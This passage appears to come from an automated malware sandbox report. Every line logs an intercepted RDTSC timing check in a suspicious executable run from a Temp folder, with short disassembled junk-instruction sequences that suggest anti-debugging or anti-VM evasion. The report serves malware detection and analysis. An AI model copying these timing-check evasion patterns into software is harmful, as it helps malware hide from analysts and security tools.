                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6B292 second address: C6B2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F34D94219DDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6B2AA second address: C6B2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC0h 0x00000007 jmp 00007F34D8F44CC7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6B58C second address: C6B593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1BB27 second address: C1BB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1BBEC second address: C1BBF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6BCF5 second address: C6BD0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F34D8F44CC0h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6BD0F second address: C6BD19 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6BD19 second address: C6BD61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 jmp 00007F34D8F44CC1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F34D8F44CC2h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6BD61 second address: C6BD71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F34D94219DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6BD71 second address: C6BD76 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6F876 second address: C6F886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DCh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6F886 second address: C6F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F34D8F44CC3h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6F8A6 second address: C6F8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DDh 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6FCA4 second address: C6FCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBDh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6FCB5 second address: C6FCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6FCB9 second address: C6FCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6FCD3 second address: C6FCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6FCD7 second address: C6FCDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6FF82 second address: C6FF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C700E0 second address: C700E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C748A6 second address: C748AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C748AA second address: C748DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F34D8F44CBBh 0x0000000d pushad 0x0000000e js 00007F34D8F44CB8h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 jnc 00007F34D8F44CB6h 0x0000001d jmp 00007F34D8F44CBAh 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C748DB second address: C748F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D94219D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 ja 00007F34D94219D6h 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7A3E8 second address: C7A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7AA07 second address: C7AA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7AA0F second address: C7AA15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7AD0D second address: C7AD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7AD15 second address: C7AD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7B56C second address: C7B579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F34D94219DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7B579 second address: C7B57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7B57D second address: C7B58F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7B58F second address: C7B5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F34D8F44CC3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7B5BE second address: C7B5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7BABB second address: C7BABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7C112 second address: C7C118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7C118 second address: C7C11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7C11E second address: C7C122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7C122 second address: C7C126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7C126 second address: C7C12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7F28F second address: C7F29E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7F29E second address: C7F2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007F34D94219DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7F2B5 second address: C7F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7F538 second address: C7F53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7F53C second address: C7F55A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F34D8F44CC4h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C7F55A second address: C7F55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8D5B8 second address: C8D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8D6F7 second address: C8D724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F34D94219DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F34D94219E9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8D724 second address: C8D73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnc 00007F34D8F44CB6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8D73A second address: C8D73F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8D73F second address: C8D762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F34D8F44CB6h 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8D8BD second address: C8D8C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8E1D8 second address: C8E1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8E1E2 second address: C8E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8E1E8 second address: C8E20C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F34D8F44CB6h 0x00000008 jmp 00007F34D8F44CC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8E20C second address: C8E210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C8C88B second address: C8C892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA069E second address: CA06B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DFh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA06B1 second address: CA06BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D8F44CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA06BB second address: CA06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F34D94219DEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA06CB second address: CA06D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA023B second address: CA023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA023F second address: CA0245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA0245 second address: CA0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA0251 second address: CA0257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA0257 second address: CA025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA376B second address: CA3771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA6188 second address: CA6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA6192 second address: CA61A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CA5D09 second address: CA5D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CB3D5E second address: CB3D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D8F44CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CB3D6A second address: CB3D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CB3D6F second address: CB3D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CB3D75 second address: CB3D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F34D94219DDh 0x0000000e jnl 00007F34D94219D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC1089 second address: CC108D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC108D second address: CC1091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC1091 second address: CC10A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F34D8F44CBEh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC11F2 second address: CC1201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F34D94219D6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC1393 second address: CC13C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D8F44CB6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC3h 0x00000013 jmp 00007F34D8F44CC4h 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC17BE second address: CC17D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC17D9 second address: CC17EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F34D8F44CBCh 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC1933 second address: CC1954 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F34D94219DEh 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC1954 second address: CC196A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F34D8F44CBBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC534A second address: CC535B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC535B second address: CC5363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC4EA0 second address: CC4EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC4EA4 second address: CC4EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC4EA8 second address: CC4EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F34D94219DEh 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC4EBE second address: CC4EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC503C second address: CC5070 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jnl 00007F34D94219F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CC8CB5 second address: CC8CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CD2A94 second address: CD2A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CD2A9A second address: CD2AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CE818F second address: CE8194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
